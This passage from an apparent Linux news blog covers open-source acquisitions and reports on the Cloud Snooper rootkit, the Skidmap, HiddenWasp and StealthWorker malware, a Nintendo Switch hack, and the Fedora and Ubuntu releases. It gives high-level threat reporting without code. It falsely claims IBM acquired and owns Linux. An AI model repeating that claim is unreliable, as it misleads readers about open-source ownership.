But what open-source devotees don't know, or don't stress, is that open-source software can be bought and acquired by commercial companies. The question is how it can be bought if it is open source; the answer is that it still carries copyrights, which can be bought and changed to closed source. And OSS is being acquired at lightning speed: IBM acquired Linux and Red Hat, and Microsoft is portraying itself as "the open-source leader" by joining the Open Invention Network (OIN) and acquiring GitHub.

There are advantages when big companies take over open-source software: these projects were not established with a business model and will run out, but if such companies buy them out they can stay afloat and provide for their customers. But there is also a dark side to these acquisitions, as they could mean the end of open source. With the rights sold, the open-source rights could be closed and the free service could come to an end. Those who have already used the open-source version would not be affected, as it is already licensed, but any future version of the software could be closed.

Microsoft says that “Microsoft is all-in on open source, we have been on a journey with open source, and today we are active in the open-source ecosystem, we contribute to open-source projects, and some of our most vibrant developer tools and frameworks are open source.” The same goes for IBM's Linux. But these are big and popular projects; what about small software with less distribution and fewer copyrights? The dark cloud still hovers over them.

Hackers Attack Amazon Web Services Server


A group of sophisticated hackers slammed Amazon Web Services (AWS) servers. The hackers installed a rootkit that let them manually command the servers and direct sensitive stolen corporate data to their home command-and-control (C2) servers. The attackers breached a variety of Windows and Linux systems within the AWS data center. A report published last week by Sophos (from Britain) has raised doubts and suspicions in the cybersecurity industry.


According to the Sophos report, the hackers were able to get past the AWS security groups (SGs) easily. Security groups are supposed to work as a security check to ensure that no malicious actor ever breaches the EC2 instance (a virtual server used by AWS to run applications). The anonymous victim of this attack had already set up a perfectly tuned SG. But due to the rootkit installed on the AWS servers, the hackers obtained remote access while the Linux OS was still looking for inbound connections, and that is when Sophos intervened. Sophos said that the victim could have been anyone, not just AWS.

The problem was not with AWS; this piggybacking method could have breached most firewalls, if not all. According to the cybersecurity experts' conclusion, the hackers are likely to be state-sponsored. The incident has been named "Cloud Snooper." A cybersecurity expert even termed it a beautiful piece of work (from a technical point of view). These things happen all the time, he says; it only came to notice because it happened to a fancy organization. There are still unanswered questions about the hack, but the most important one, how the hackers were able to manage this attack, has been answered.

About the attack 

“An analysis of this system revealed the presence of a rootkit that granted the malware’s operators the ability to remotely control the server through the AWS SGs. But this rootkit’s capabilities are not limited to doing this in the Amazon cloud: It also could be used to communicate with, and remotely control, malware on any server behind any boundary firewall, even an on-premises server. By unwinding other elements of this attack, we further identified other Linux hosts, infected with the same or a similar rootkit," said Sophos.

Skidmap, Linux Malware Mining Cryptocurrency in Disguise



Security researchers have discovered a new strain of Linux malware that is configured to carry out a multitude of malicious activities besides illegally mining cryptocurrency; by using a "secret master password", it gives hackers universal access to the system.

The Linux malware, Skidmap, demonstrates the increasing complexity of cryptocurrency-mining malware and the prevalence of the corresponding threats.

In order to carry out its cryptocurrency mining in disguise, Skidmap forges CPU-related statistics and network traffic, according to TrendMicro's recent blog on the subject.

Highlighting the advanced methods used by Skidmap, researchers at TrendMicro said, "Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware."

“Cryptocurrency-mining threats don’t just affect a server or workstation’s performance — they could also translate to higher expenses and even disrupt businesses especially if they are used to run mission-critical operations,” reads the blog.

How does the infection take place?

It starts in 'crontab', which is a standard Linux process responsible for periodically scheduling timed tasks in Unix-like systems. After that, Skidmap installs various malicious binaries and then weakens the security settings of the affected machine so that the cryptocurrency mining can start smoothly.

While the cryptocurrency miners generate digital money for the hackers, additional binaries placed on the system monitor them.

To stay guarded against this cryptocurrency-mining malware, admins are advised to update and patch their servers and machines, and to be alert to unverified repositories.

Undetected malware attacks Linux systems

A new, sophisticated and unique Linux malware dubbed HiddenWasp is being used in targeted attacks against victims who are already under attack or have gone through heavy reconnaissance.

The malware is highly sophisticated and went undetected; it is still active and has a zero detection rate. The malware adopted a massive amount of code from publicly available malware such as Mirai and the Azazel rootkit.

Unlike Windows malware authors, Linux malware authors do not concentrate much on evasion techniques, as the use of anti-virus solutions on Linux machines is far less common than on other platforms.

However, the Intezer report shows “malware with strong evasion techniques does exist for the Linux platform. There is also a high ratio of publicly available open-source malware that utilizes strong evasion techniques and can be easily adapted by attackers.” In the past, we saw much malware focussed on crypto-mining or DDoS activity, but HiddenWasp is purely a targeted remote control attack.

The malware is composed of a user-mode rootkit, a trojan, and an initial deployment script. Researchers spotted that the files went undetected in VirusTotal and that the malware was hosted on servers of ThinkDream, a hosting company located in Hong Kong.

While analyzing the scripts, Intezer spotted a user named ‘sftp’ and hard-coded values, which can be used for initial compromise; the scripts also have a variable for clearing older versions from the compromised systems.

The scripts also include variables to determine the server architecture of the compromised system and download components from the malicious server based on that architecture. Once the components are installed, the trojan is executed on the system.

“Within this script, we were able to observe that the main implants were downloaded in the form of tarballs. As previously mentioned, each tarball contains the main trojan, the rootkit, and a deployment script for x86 and x86_64 builds accordingly.”

StealthWorker: Manipulates Compromised E-Commerce Websites To Attack Windows and Linux Platforms




A new brute-force malware which goes by the name of StealthWorker was recently uncovered. This malware allegedly uses compromised e-commerce websites to steal personal data.

The platforms that have mainly been affected by this malware are Linux and Windows.

Personal information and payment data are the basic motivations behind these malware attacks.

The malware is written in a unique and rarely used language, “Golang”, which is already being used by the Mirai botnet development module.

To make all this happen the e-commerce websites are first compromised by employing an embedded skimmer.

The websites are compromised either by exploiting plugin vulnerabilities or by making use of a Content Management System (CMS).

The malware emerged while the researchers were analyzing the command and control server (5.45.69[.]149).

That’s where they found the storage directory with samples intended to brute-force a source admin tool.

Previous versions of this malware had only Windows on their radar.

But the latest version happens to have server payload binaries to get into Linux as well.

One of the samples that the researchers were working on is “PhpMyAdminBrut_Windows_x86.exe” where an IP was found which led to a web panel login with an array of new samples.

Some open directories were also found containing new file names that pointed to IoT devices with ARM and MIPS architectures.

StealthWorker sets up a routine execution to ensure that the malware persists even after the system is rebooted.

The researchers also used an IDA Python script to look for other malicious functions.

The research also found that other platforms and services are on the target list, namely FTP, Joomla, cPanel, MySQL, SSH and others.

Furthermore, the cyber-criminals are also making other major moves towards infecting an extensive variety of platforms.

Hacker Group Makes Nintendo Switch a Linux Machine

As reported earlier this month, Hacker Group fail0verflow had tweeted a picture showing that they had managed to run Linux on Nintendo Switch. That was February 6; now, 12 days later, they have released a video on their account, providing proof of the same.

The video shows a Switch console running a Linux-based desktop environment KDE Plasma, with full touchscreen support and a web browser, something which the gaming console did not originally have.


While usually people hack into gaming consoles to play cracked versions of games, some people just enjoy running whatever kind of software they want on them. This seems to be one of those cases.

Fail0verflow is a hacking group that focuses its hacking efforts on gaming consoles and has recently taken up Nintendo Switch, as have many others.

While the hacking group has still not made public their exact method and code, it reportedly involves exploiting a flaw in the boot ROM of the Switch’s Nvidia Tegra X1 chip. As they revealed last time, the video maintains that the flaw can’t be patched by Nintendo on current devices but allegedly can be addressed in future production.

Fedora 16 Linux Released (Codename "Verne")



Fedora 16 (codename "Verne") Linux was released today. Powered by the newly released Linux kernel 3.1, it features the GNOME 3.2.1 desktop environment with the GNOME Shell interface and the KDE Software Compilation 4.7.2 environment. Fedora 16 includes OpenStack, lots of SELinux enhancements, updated Haskell, Perl and Ada environments, Blender 2.5, Boost 1.47, TigerVNC 1.1, and much more.

The following are major features for Fedora 16:

  • Enhanced cloud support including Aeolus Conductor, Condor Cloud, HekaFS, OpenStack and pacemaker-cloud
  • KDE Plasma workspaces 4.7
  • GNOME 3.2
  • A number of core system improvements including GRUB 2 and the removal of HAL.
  • An updated libvirtd, trusted boot, guest inspection, virtual lock manager and a pvops based kernel for Xen all improve virtualization support.
Full feature list here


Ubuntu 11.10(Oneiric Ocelot) is Released ~ Upgrade Now


Recently, Ubuntu released Ubuntu 11.10. If you are interested to know what it looks like or how it works, you can take this tour. It is available in 38 languages. Ubuntu is free to use. If you haven't used Ubuntu yet, then give it a try now with Ubuntu 11.10.

You can download the full operating system from here:
http://www.ubuntu.com/download
or
if you have installed Ubuntu 11.04, you will be asked to upgrade to Ubuntu 11.10 (that's how I came to know about it).
  
Ubuntu 11.10: Open for business
Make your IT budget go further with Ubuntu! The latest release of Ubuntu includes everything you need for your business desktop, server and cloud.

The user Interface looks good. I am curious to use it now itself but my net connection.
